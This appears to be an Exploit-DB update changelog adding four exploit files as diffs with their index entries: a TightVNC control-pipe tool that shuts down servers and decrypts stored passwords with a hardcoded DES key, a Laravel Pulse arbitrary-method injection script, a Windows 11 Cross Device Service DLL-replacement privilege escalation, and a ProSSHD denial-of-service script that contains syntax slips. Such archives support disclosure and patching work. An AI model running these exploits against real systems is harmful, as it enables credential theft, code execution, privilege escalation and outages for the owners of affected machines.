DB: 2025-06-10

5 changes to exploits/shellcodes/ghdb

TightVNC 2.8.83 - Control Pipe Manipulation

Laravel Pulse 1.3.1 - Arbitrary Code Injection

Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege

ProSSHD 1.2 20090726 - Denial of Service (DoS)

exploits/multiple/local/52322.c

@@ -0,0 +1,252 @@
+# Exploit Title: TightVNC 2.8.83 - Control Pipe Manipulation
+# Date: 06/09/2025
+# Exploit Author: Ionut Zevedei (mail@izvd.eu)
+# Exploit Repository: https://github.com/zeved/CVE-2024-42049-PoC
+# Vendor Homepage: https://www.tightvnc.com/
+# Software Link: https://www.tightvnc.com/download.php
+# Version: 2.8.83
+# Tested on: Windows 10 x64 - TightVNC 2.5.10, 2.8.81
+# CVE : CVE-2024-42049
+
+#include <windows.h>=20
+#include <stdio.h>
+#include <conio.h>
+#include <tchar.h>
+#include "descrypt.h"
+
+#define GETBYTE(x, n) (((x) >> ((n) * 8)) & 0xFF)
+#define BUFFER_SIZE 512
+
+#define TVNC_CMD_DISCONNECT_ALL_CLIENTS 0x06
+#define TVNC_CMD_GET_CLIENT_LIST        0x04
+#define TVNC_CMD_SHUTDOWN_SERVER        0x07
+#define TVNC_CMD_GET_SERVER_INFO        0x11
+#define TVNC_CMD_GET_CONFIG             0x12
+
+const unsigned int commands[6] =3D {
+  TVNC_CMD_DISCONNECT_ALL_CLIENTS,
+  TVNC_CMD_GET_CLIENT_LIST,
+  TVNC_CMD_SHUTDOWN_SERVER,
+  TVNC_CMD_GET_SERVER_INFO,
+  TVNC_CMD_GET_CONFIG,
+};
+
+unsigned char des_key[8] =3D { 23, 82, 107, 6, 35, 78, 88, 7 };
+
+void get_bytes(unsigned int data, unsigned char* out) {
+  out[0] =3D GETBYTE(data, 3);
+  out[1] =3D GETBYTE(data, 2);
+  out[2] =3D GETBYTE(data, 1);
+  out[3] =3D GETBYTE(data, 0);
+}
+
+// printf is wonky when printing passwords later
+void print_passwd(unsigned char* passwd) {
+  for (int i =3D 0; i < 8; i++) {
+    printf("%c", passwd[i]);
+  }
+  printf("\n");
+}
+
+void print_error(unsigned long error_code) {
+  unsigned char* buffer;
+ =20
+  // damn it windows...
+  FormatMessage(
+    FORMAT_MESSAGE_ALLOCATE_BUFFER |
+    FORMAT_MESSAGE_FROM_SYSTEM |
+    FORMAT_MESSAGE_IGNORE_INSERTS,
+    NULL,
+    error_code,
+    MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
+    (LPTSTR) &buffer,
+    0, NULL);
+
+  printf("[error]: %s\n", buffer);
+}
+
+void decrypt_passwords(unsigned char *buffer_ptr, unsigned int offset) {
+  unsigned char primary_passwd[8] =3D { 0x00 };
+  unsigned char view_only_passwd[8] =3D { 0x00 };
+
+  printf("\n\tencrypted primary password: ");
+  for (int i =3D 0; i < 8; i++) {
+    primary_passwd[i] =3D buffer_ptr[offset + 8 + i];
+    printf("%02x ", primary_passwd[i]);
+  }
+  printf("\n\tencrypted view-only password: ");
+  for (int i =3D 0; i < 8; i++) {
+    view_only_passwd[i] =3D buffer_ptr[offset + i];
+    printf("%02x ", view_only_passwd[i]);
+  }
+
+
+  unsigned char primary_passwd_decrypted[8] =3D { 0x00 };
+  unsigned char view_only_passwd_decrypted[8] =3D { 0x00 };
+
+  decrypt(primary_passwd_decrypted, view_only_passwd,
+    sizeof(primary_passwd_decrypted), des_key);
+  decrypt(view_only_passwd_decrypted, primary_passwd,
+    sizeof(view_only_passwd_decrypted), des_key);
+
+  printf("\n\tdecrypted primary password: ");
+  print_passwd(primary_passwd_decrypted);
+  printf("\tdecrypted view-only password: ");
+  print_passwd(view_only_passwd_decrypted);
+}
+
+BOOL open_pipe(PHANDLE handle_ptr, char *pipe_name) {
+  unsigned long pipe_mode;
+  BOOL result =3D FALSE;
+  printf("[~] opening pipe %s...\n", pipe_name);
+
+  while (1) {
+    *handle_ptr =3D CreateFile(
+      pipe_name,
+      GENERIC_READ | GENERIC_WRITE,
+      0,
+      NULL,
+      OPEN_EXISTING,
+      FILE_FLAG_OVERLAPPED,
+      NULL
+    );
+
+    if (*handle_ptr !=3D INVALID_HANDLE_VALUE) {
+      printf("[+] pipe opened\n");
+      break;
+    }
+
+    if (GetLastError() !=3D ERROR_PIPE_BUSY) {
+      printf("[-] could not open pipe\n");
+      print_error(GetLastError());
+      return FALSE;
+    }
+
+    printf("[~] waiting for named pipe to be available - if this hangs the =
+pipe server might be dead.\n");
+
+    WaitNamedPipe(pipe_name, NMPWAIT_WAIT_FOREVER);
+  }
+
+  pipe_mode =3D PIPE_READMODE_BYTE;
+  result =3D SetNamedPipeHandleState(*handle_ptr, &pipe_mode, NULL, NULL);
+
+  if (!result) {
+    printf("[-] failed setting pipe read mode\n");
+    print_error(GetLastError());
+    return result;
+  }
+
+  return result;
+}
+
+int main(int argc, char* argv[]) {
+
+  HANDLE        pipe_handle =3D NULL;
+  unsigned char message[8] =3D { 0x00 };
+  unsigned char buffer[BUFFER_SIZE] =3D { 0x00 };
+  BOOL          result =3D FALSE;
+  unsigned long bytes_read, bytes_written;
+  unsigned int  cmd_index =3D 0;
+  unsigned int  offset =3D 30;
+
+  if (argc < 3) {
+    printf("usage: %s <command> <pipe> <offset?>\n", argv[0]);
+    printf("offset - optional: default is 30 - change as needed\n");
+    printf("commands:\n");
+    printf("\t1 - disconnect all clients\n");
+    printf("\t2 - get client list\n");
+    printf("\t3 - shutdown server\n");
+    printf("\t4 - get server info\n");
+    printf("\t5 - get server config\n");
+    printf("example pipes:\n\t\\\\192.168.1.42\\pipe\\TightVNC_Service_Cont=
+rol\n");
+    printf("\t\\\\.\\pipe\\TightVNC_Application_Control_On_Session1\n\n");
+    return 0;
+  }
+
+  char* stop =3D NULL;
+  cmd_index =3D strtol(argv[1], &stop, 10);
+
+  if (stop =3D=3D '\0') {
+    return 0;
+  }
+
+  cmd_index--;
+
+  if (argc =3D=3D 4) {
+    stop =3D NULL;
+    offset =3D strtol(argv[3], &stop, 10);
+
+    if (offset =3D=3D 0 || stop =3D=3D '\0') {
+      return 0;
+    }
+  }
+
+  if (!open_pipe(&pipe_handle, argv[2])) {
+    goto exit;
+  }
+
+  printf("[i] sending command...\n");
+ =20
+  get_bytes(commands[cmd_index], message);
+  result =3D WriteFile(pipe_handle, message, 8, &bytes_written, NULL);
+
+  if (!result) {
+    printf("[-] failed writing to pipe\n");
+    print_error(GetLastError());
+    goto exit;
+  }
+
+  printf("[~] message sent; waiting for reply\n");
+
+  do {
+    result =3D ReadFile(
+      pipe_handle,
+      buffer,
+      BUFFER_SIZE * sizeof(unsigned char),
+      &bytes_read,
+      NULL
+    );
+
+    if (!result && GetLastError() !=3D ERROR_MORE_DATA)
+      break;
+
+    printf("[+] got %d bytes back!\n", bytes_read);
+    printf("    hex: \n\t");
+
+    for (int i =3D 0; i < bytes_read; i++) {
+      printf("%02x ", buffer[i]);
+    }
+
+    printf("\n    char: \n\t");
+    for (int i =3D 0; i < bytes_read; i++) {
+      printf("%c", buffer[i]);
+    }
+    printf("\n\n");
+
+    if (cmd_index =3D=3D 4) {
+      printf("\n[~] command is get config, attempting to decrypt passwords =
+using offset %d...\n", offset);
+      decrypt_passwords(&buffer, offset);
+    }
+
+    memset(buffer, 0, BUFFER_SIZE);
+  } while (!result);
+
+  if (!result)
+  {
+    printf("[-] failed reading from pipe\n");
+    print_error(GetLastError());
+    goto exit;
+  }
+
+  printf("\n[+] done\n\n");
+
+exit:
+  if (pipe_handle !=3D NULL) {
+    CloseHandle(&pipe_handle);
+  }
+
+  return 0;
+}

exploits/php/webapps/52319.py

@@ -0,0 +1,127 @@
+#!/usr/bin/env python3
+# Exploit Title: Laravel Pulse 1.3.1 - Arbitrary Code Injection
+# Author: Mohammed Idrees Banyamer (@banyamer_security)
+# GitHub: https://github.com/mbanyamer
+# Date: 2025-06-06
+# Tested on: Laravel Pulse v1.2.0 / Ubuntu 22.04 / Apache2
+# CVE: CVE-2024-55661
+# Type: Remote Code Execution (via Arbitrary Code Injection)
+# Platform: PHP (Laravel Livewire)
+# Author Country: Jordan
+# Description:
+#   A vulnerability in Laravel Pulse (< 1.3.1) allows arbitrary code injection via
+#   the `remember()` method in the `RemembersQueries` trait. The attacker can craft
+#   a Livewire request to invoke arbitrary callables, enabling data exfiltration or
+#   remote execution if unsafe classes are exposed.
+
+"""
+Laravel Pulse < 1.3.1 - Arbitrary Code Injection Exploit (CVE-2024-55661)
+Author: Mohammed Idrees Banyamer | PoC
+
+This tool exploits the vulnerability in the `remember()` method in vulnerable versions
+of laravel/pulse to trigger arbitrary code execution or sensitive data leakage via Livewire.
+"""
+
+import argparse
+import requests
+import json
+import sys
+from rich import print
+from rich.console import Console
+
+console = Console()
+
+class LaravelPulseExploit:
+    def __init__(self, url, component, method, csrf=None, key='exploit', component_id='abcde'):
+        self.url = url.rstrip('/')
+        self.component = component
+        self.method = method
+        self.csrf = csrf
+        self.key = key
+        self.component_id = component_id
+        self.headers = {
+            "Content-Type": "application/json",
+            "X-Livewire": "true",
+            "Accept": "application/json"
+        }
+
+        if csrf:
+            self.headers["X-CSRF-TOKEN"] = csrf
+
+    def build_payload(self):
+        return {
+            "type": "callMethod",
+            "method": "remember",
+            "params": [self.method, self.key],
+            "id": self.component_id,
+            "name": self.component
+        }
+
+    def send(self):
+        full_url = f"{self.url}/livewire/message/{self.component}"
+        payload = self.build_payload()
+
+        console.print(f"[bold cyan][*] Sending exploit to:[/bold cyan] {full_url}")
+        try:
+            response = requests.post(full_url, headers=self.headers, json=payload, timeout=10)
+        except requests.exceptions.RequestException as e:
+            console.print(f"[bold red][-] Request failed:[/bold red] {str(e)}")
+            sys.exit(1)
+
+        self.display_response(response)
+
+    def display_response(self, response):
+        console.print(f"\n[bold green][+] Status Code:[/bold green] {response.status_code}")
+        if response.status_code == 200:
+            try:
+                data = response.json()
+                pretty_data = json.dumps(data, indent=4, ensure_ascii=False)
+                console.print(f"[bold yellow]\n[+] Response JSON:[/bold yellow]\n{pretty_data}")
+            except json.JSONDecodeError:
+                console.print(f"[bold red][-] Failed to decode JSON:[/bold red]\n{response.text}")
+        else:
+            console.print(f"[bold red][-] Unexpected response:[/bold red] {response.text}")
+
+
+def parse_arguments():
+    parser = argparse.ArgumentParser(
+        description="Exploit Laravel Pulse (<1.3.1) Arbitrary Code Injection (CVE-2024-55661)"
+    )
+    parser.add_argument("-u", "--url", required=True, help="Base URL of the Laravel app (e.g. http://example.com)")
+    parser.add_argument("-c", "--component", required=True, help="Livewire component name (e.g. ConfigComponent)")
+    parser.add_argument("-m", "--method", required=True, help="Static method to call (e.g. \\Illuminate\\Support\\Facades\\Config::all)")
+    parser.add_argument("-k", "--key", default="exploit", help="Cache key (default: exploit)")
+    parser.add_argument("--csrf", help="Optional CSRF token header")
+    parser.add_argument("--id", default="abcde", help="Component ID (default: abcde)")
+    return parser.parse_args()
+
+
+def banner():
+    console.print("""
+[bold red]
+ ____                       _
+| __ )  __ _ _ __  _   _   / \   _ __ ___   ___ _ __
+|  _ \ / _` | '_ \| | | | / _ \ | '_ ` _ \ / _ \ '__|
+| |_) | (_| | | | | |_| |/ ___ \| | | | | |  __/ |
+|____/ \__,_|_| |_|\__, /_/   \_\_| |_| |_|\___|_|
+                   |___/
+[/bold red]
+    [bold white]Laravel Pulse < 1.3.1 Arbitrary Code Injection (CVE-2024-55661)[/bold white]
+         [blue]Author:[/blue] Mohammed Idrees Banyamer | [green]Poc[/green]
+    """)
+
+
+if __name__ == "__main__":
+    banner()
+    args = parse_arguments()
+
+    exploit = LaravelPulseExploit(
+        url=args.url,
+        component=args.component,
+        method=args.method,
+        csrf=args.csrf,
+        key=args.key,
+        component_id=args.id
+    )
+
+    exploit.send()

exploits/windows/local/52320.py

@@ -0,0 +1,160 @@
+#!/usr/bin/env python3
+# Exploit Title: Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege
+# Author: Mohammed Idrees Banyamer
+# Instagram: @banyamer_security
+# GitHub: https://github.com/mbanyamer
+# Date: 2025-06-06
+# Tested on: Windows 11 Version 24H2 for x64-based Systems (10.0.26100.3476)
+# CVE: CVE-2025-24076
+#
+# Affected Versions:
+# - Windows 11 Version 24H2 (x64 and ARM64)
+# - Windows 11 Version 23H2 (x64 and ARM64)
+# - Windows 11 Version 22H2 (x64 and ARM64)
+# - Windows Server 2025
+# - Windows Server 2022 23H2 (Server Core installation)
+#
+# Type: Elevation of Privilege
+# Platform: Microsoft Windows
+# Author Country: Jordan
+# CVSS v3.1 Score: 7.3 (Important)
+# Weakness: CWE-284: Improper Access Control
+# Attack Vector: Local
+# Privileges Required: Low
+# User Interaction: Required
+# Scope: Unchanged
+# Confidentiality, Integrity, Availability Impact: High
+# Exploit Code Maturity: Unproven
+# Remediation Level: Official Fix
+# Description:
+# This vulnerability affects Microsoft Windows 11 (various versions including 24H2, 23H2, and 22H2)
+# and Windows Server 2025. It targets improper access control in the Windows Cross Device Service,
+# allowing a low-privileged local attacker to overwrite a critical DLL file (CrossDevice.Streaming.Source.dll)
+# in a writable directory. After triggering user interaction by opening Windows "Mobile devices" Settings,
+# the attacker can replace the DLL with a malicious version, leading to SYSTEM privilege escalation.
+#
+# Steps of exploitation:
+# 1. Verify the presence of the vulnerable DLL in the writable directory.
+# 2. Build a malicious DLL that executes code with SYSTEM privileges upon loading.
+# 3. Backup the original DLL to allow recovery.
+# 4. Trigger the DLL load by instructing the user to open the "Mobile devices" Settings page.
+# 5. Wait until the DLL is unlocked and replace it with the malicious DLL.
+# 6. Achieve SYSTEM privileges when the system loads the malicious DLL.
+#
+# This exploit requires low privileges and user interaction but has low attack complexity
+# and results in high impact due to full privilege escalation.
+#
+
+
+
+import os
+import shutil
+import time
+from pathlib import Path
+import subprocess
+
+# Target DLL name based on vulnerability research
+DLL_NAME = "CrossDevice.Streaming.Source.dll"
+TARGET_PATH = Path("C:/ProgramData/CrossDevice")
+MALICIOUS_DLL = Path("malicious.dll")
+BACKUP_ORIGINAL_DLL = Path("original_backup.dll")
+
+# C source code for malicious DLL
+MALICIOUS_C_CODE = r'''
+#include <windows.h>
+#include <stdio.h>
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
+    if (fdwReason == DLL_PROCESS_ATTACH) {
+        FILE *file = fopen("C:\\poc_only_admin_can_write_to_c.txt", "w");
+        if (file) {
+            fputs("Exploit succeeded! You have SYSTEM privileges.\n", file);
+            fclose(file);
+        }
+    }
+    return TRUE;
+}
+'''
+
+def build_malicious_dll():
+    print("[*] Building malicious DLL from C source...")
+    c_file = Path("malicious.c")
+    # Write C source code to file
+    with open(c_file, "w") as f:
+        f.write(MALICIOUS_C_CODE)
+    # Compile DLL using gcc (MinGW)
+    compile_cmd = [
+        "gcc", "-shared", "-o", str(MALICIOUS_DLL), str(c_file),
+        "-Wl,--subsystem,windows"
+    ]
+    try:
+        subprocess.run(compile_cmd, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+        print(f"[+] Malicious DLL built successfully: {MALICIOUS_DLL}")
+        # Clean up C source file
+        c_file.unlink()
+        return True
+    except subprocess.CalledProcessError as e:
+        print("[!] Failed to build malicious DLL.")
+        print("gcc output:", e.stderr.decode())
+        return False
+
+def is_vulnerable():
+    if not TARGET_PATH.exists():
+        print("[!] Target directory not found.")
+        return False
+    dll_path = TARGET_PATH / DLL_NAME
+    if not dll_path.exists():
+        print("[!] Target DLL not found.")
+        return False
+    print("[+] System appears vulnerable, DLL found in a writable path.")
+    return True
+
+def backup_original():
+    dll_path = TARGET_PATH / DLL_NAME
+    backup_path = TARGET_PATH / BACKUP_ORIGINAL_DLL
+    shutil.copyfile(dll_path, backup_path)
+    print(f"[+] Backup created at: {backup_path}")
+
+def replace_with_malicious():
+    dll_path = TARGET_PATH / DLL_NAME
+    try:
+        shutil.copyfile(MALICIOUS_DLL, dll_path)
+        print("[+] Successfully replaced the DLL with malicious version.")
+        return True
+    except PermissionError:
+        print("[!] Cannot write to DLL. Make sure the process using it is stopped.")
+        return False
+
+def monitor_and_replace():
+    dll_path = TARGET_PATH / DLL_NAME
+    print("[*] Monitoring DLL until it is unlocked...")
+    while True:
+        try:
+            with open(dll_path, 'rb+') as f:
+                print("[+] File is unlocked. Attempting replacement...")
+                time.sleep(0.5)
+                return replace_with_malicious()
+        except PermissionError:
+            time.sleep(0.5)
+
+def trigger_com():
+    print("[*] To trigger DLL load, please open Windows Settings -> Mobile devices")
+    input("[*] After opening Settings, press Enter to continue...")
+
+def main():
+    if not build_malicious_dll():
+        return
+    if not is_vulnerable():
+        return
+
+    backup_original()
+    trigger_com()
+
+    success = monitor_and_replace()
+    if success:
+        print("[✓] Exploit completed successfully. Check results (e.g., C:\\poc_only_admin_can_write_to_c.txt).")
+    else:
+        print("[✗] Exploit failed.")
+
+if __name__ == "__main__":
+    main()

exploits/windows/remote/52321.NA

@@ -0,0 +1,68 @@
+# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)
+# Google Dork: N/A
+# Date: 13 january 2024
+# Exploit Author: Fernando Mengali
+# Vendor Homepage: https://prosshd.com/
+# Software Link: N/A
+# Version: 1.2 20090726
+# Tested on: Windows XP
+# CVE: CVE-2024-0725
+
+    $sis="$^O";
+
+    if ($sis eq "windows"){
+      $cmd="cls";
+    } else {s
+      $cmd="clear";
+    }
+
+    system("$cmd");
+
+    intro();
+    main();
+
+print "\t    ==> Connecting to webserver... \n\n";
+sleep(1);
+
+my $i=0;
+    print "\t    ==> Exploiting... \n\n";
+
+my $payload  = "\x41" x 500;
+
+$connection2 = Net::SSH2->new();
+$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";
+$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
+$scpget = $connection2->scp_get($payload);
+$connection2->disconnect();
+
+print "\t    ==> Done! Exploited!";
+   sub intro {
+      print q {
+
+	                            ,--,
+	                     _ ___/ /\|
+	                 ,;'( )__, )  ~
+	                //  //   '--;
+	                '   \     | ^
+	                     ^    ^
+
+	    [+] ProSSHD 1.2 20090726 - Denial of Service (DoS)
+
+	    [*] Coded by Fernando Mengali
+
+	    [@] e-mail: fernando.mengalli@gmail.com
+
+      }
+  }
+
+  sub main {
+
+our ($ip, $port, $username, $password) = @ARGV;
+
+      unless (defined($ip) && defined($port)) {
+
+        print "\n\tUsage: $0 <ip> <port> <username> <password>           \n";
+        exit(-1);
+
+      }
+  }

files_exploits.csv

@@ -10589,6 +10589,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple,,2003-06-05,2012-11-15,1,CVE-2003-1123;OSVDB-15151,,,,,https://www.securityfocus.com/bid/7824/info
 9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple,,2009-10-16,,1,CVE-2009-3692,,,,,
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,,2020-12-09,2020-12-09,0,,,,,,
+52322,exploits/multiple/local/52322.c,"TightVNC 2.8.83 - Control Pipe Manipulation",2025-06-09,"Ionut Zevedei",local,multiple,,2025-06-09,2025-06-09,0,CVE-2024-42049,,,,,
 52292,exploits/multiple/local/52292.c,"TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow",2025-05-13,"Mohamed Maatallah",local,multiple,,2025-05-13,2025-05-13,0,CVE-2024-11237,,,,,
 19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
@@ -22710,6 +22711,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52000,exploits/php/webapps/52000.txt,"Laravel Framework 11 - Credential Leakage",2024-04-21,"Huseein Amer",webapps,php,,2024-04-21,2024-04-21,0,CVE-2024-29291,,,,,
 44343,exploits/php/webapps/44343.py,"Laravel Log Viewer < 0.13.0 - Local File Download",2018-03-26,"Haboob Team",webapps,php,,2018-03-26,2018-03-26,0,CVE-2018-8947,,,,,
 49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,,2020-12-04,2020-12-04,0,,,,,,
+52319,exploits/php/webapps/52319.py,"Laravel Pulse 1.3.1 - Arbitrary Code Injection",2025-06-09,"Mohammed Idrees Banyamer",webapps,php,,2025-06-09,2025-06-09,0,CVE-2024-55661,,,,,
 5886,exploits/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,,1,,,,,,
 5454,exploits/php/webapps/5454.txt,"LaserNet CMS 1.5 - SQL Injection",2008-04-15,cO2,webapps,php,,2008-04-14,2017-03-30,1,OSVDB-44401;CVE-2008-1913,,,,,
 33947,exploits/php/webapps/33947.txt,"Last Wizardz - 'id' SQL Injection",2010-01-31,"Sec Attack Team",webapps,php,,2010-01-31,2014-07-02,1,,,,,,https://www.securityfocus.com/bid/39968/info
@@ -41308,6 +41310,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52275,exploits/windows/local/52275.c,"Microsoft Windows 11 - Kernel Privilege Escalation",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-21338,,,,,
 52270,exploits/windows/local/52270.c,"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-49138,,,,,
 52284,exploits/windows/local/52284.C++,"Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation",2025-05-09,"Milad karimi",local,windows,,2025-05-09,2025-05-09,0,CVE-2024-38193,,,,,
+52320,exploits/windows/local/52320.py,"Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege",2025-06-09,"Mohammed Idrees Banyamer",local,windows,,2025-06-09,2025-06-09,0,CVE-2025-24076,,,,,
 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,,
 14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
 39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,,
@@ -45269,6 +45272,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34943,exploits/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",remote,windows,,2010-11-01,2014-10-12,1,,,,,,https://www.securityfocus.com/bid/44569/info
 36235,exploits/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",remote,windows,,2011-10-14,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/50133/info
 12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - (Authenticated) Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",remote,windows,,2010-05-02,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
+52321,exploits/windows/remote/52321.NA,"ProSSHD 1.2 20090726 - Denial of Service (DoS)",2025-06-09,"Fernando Mengali",remote,windows,,2025-06-09,2025-06-09,0,CVE-2024-0725,,,,,
 11618,exploits/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Remote Buffer Overflow",2010-03-02,"S2 Crew",remote,windows,,2010-03-01,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
 16346,exploits/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2016-10-27,1,CVE-2006-4948;OSVDB-29032,"Metasploit Framework (MSF)",,,http://www.exploit-db.comtftpdwin.exe,
 3132,exploits/windows/remote/3132.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",remote,windows,69,2007-01-14,2016-10-27,1,OSVDB-29032;CVE-2006-4948,,,,http://www.exploit-db.comtftpdwin.exe,